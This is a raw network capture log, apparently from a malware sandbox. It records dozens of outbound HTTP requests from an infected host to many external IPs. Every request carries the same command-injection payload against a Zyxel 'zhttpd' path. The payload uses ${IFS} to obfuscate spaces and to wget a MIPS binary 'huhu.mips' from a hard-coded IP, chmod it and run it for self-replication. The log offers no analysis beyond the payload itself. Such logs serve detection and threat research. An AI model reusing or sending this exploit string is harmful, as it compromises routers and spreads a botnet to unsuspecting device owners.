                                                      Feb 2, 2024 06:36:07.961492062 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8132192.168.2.1460518157.44.85.142443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961529970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8133192.168.2.144270853.19.179.192443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961589098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8134192.168.2.1439192176.124.40.116443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961632013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8135192.168.2.1450614213.113.23.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961647987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8136192.168.2.1452602163.38.68.103443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961699009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8137192.168.2.145382069.70.198.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961724043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8138192.168.2.1433110168.45.202.73443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961759090 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8139192.168.2.14513708.234.176.214443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961782932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8140192.168.2.145985471.78.35.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961812973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8141192.168.2.1447800164.27.84.200443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961877108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8142192.168.2.1444322137.37.125.67443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961911917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8143192.168.2.143766698.54.100.93443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961920023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8144192.168.2.1442142172.68.221.213443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.961952925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8145192.168.2.1449140157.15.212.238443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962003946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8146192.168.2.1439706157.21.138.222443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962044001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8147192.168.2.1434146131.16.26.253443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962097883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8148192.168.2.146036899.221.56.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962148905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8149192.168.2.1456608105.222.175.63443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962193966 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8150192.168.2.144838878.255.65.148443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962209940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8151192.168.2.1446482173.17.202.102443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962264061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8152192.168.2.145593275.229.66.72443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962285995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8153192.168.2.144510224.190.93.239443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962322950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8154192.168.2.1434340125.157.91.173443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962374926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8155192.168.2.14557309.211.216.221443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962404013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8156192.168.2.145724244.97.97.17443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962440014 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8157192.168.2.143403091.211.226.197443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962486029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8158192.168.2.146027023.112.176.87443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962533951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8159192.168.2.144729238.184.46.233443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962563038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8160192.168.2.144392418.185.39.162443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962600946 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8161192.168.2.146008240.204.43.168443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962625027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8162192.168.2.1460368205.125.60.182443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962665081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8163192.168.2.144612685.141.192.97443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962703943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8164192.168.2.1446572153.80.65.177443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962759972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8165192.168.2.145515290.45.74.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962816000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8166192.168.2.144471643.130.147.191443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962837934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8167192.168.2.1457990195.121.83.149443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962883949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8168192.168.2.1436212170.33.96.157443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962932110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8169192.168.2.143551641.113.88.246443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.962955952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8170192.168.2.144854623.123.180.174443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963016033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8171192.168.2.144527277.176.162.188443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963058949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8172192.168.2.143984627.125.177.38443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963105917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8173192.168.2.145985213.183.253.34443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963140011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8174192.168.2.14525921.7.43.40443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963159084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8175192.168.2.1441924143.92.164.68443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963201046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8176192.168.2.1433476113.175.229.202443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963254929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8177192.168.2.1440590220.98.73.201443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963289022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8178192.168.2.1435344174.189.185.32443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963321924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8179192.168.2.1434562206.247.30.95443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963367939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8180192.168.2.1449480177.159.178.51443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963429928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8181192.168.2.144279477.74.64.117443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963459969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8182192.168.2.1448322140.121.83.18443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963504076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8183192.168.2.1446046203.84.175.76443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963560104 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8184192.168.2.143301698.18.210.118443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963584900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8185192.168.2.1439822176.109.69.175443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963640928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8186192.168.2.1441832172.181.121.155443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963694096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8187192.168.2.1444038114.246.198.235443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963721037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8188192.168.2.1455372110.178.219.55443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963761091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8189192.168.2.1452294190.190.191.37443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963813066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8190192.168.2.1440304143.199.57.228443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963854074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8191192.168.2.1460730109.27.111.108443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963891029 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8192192.168.2.1450808152.203.11.1443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.963944912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8193192.168.2.145126859.138.169.106443
                                                      TimestampBytes transferredDirectionData
                                                      Feb 2, 2024 06:36:07.967375040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      8194192.168.2.1434338209.55.140.15443
                                                      TimestampBytes transferredDirectionData
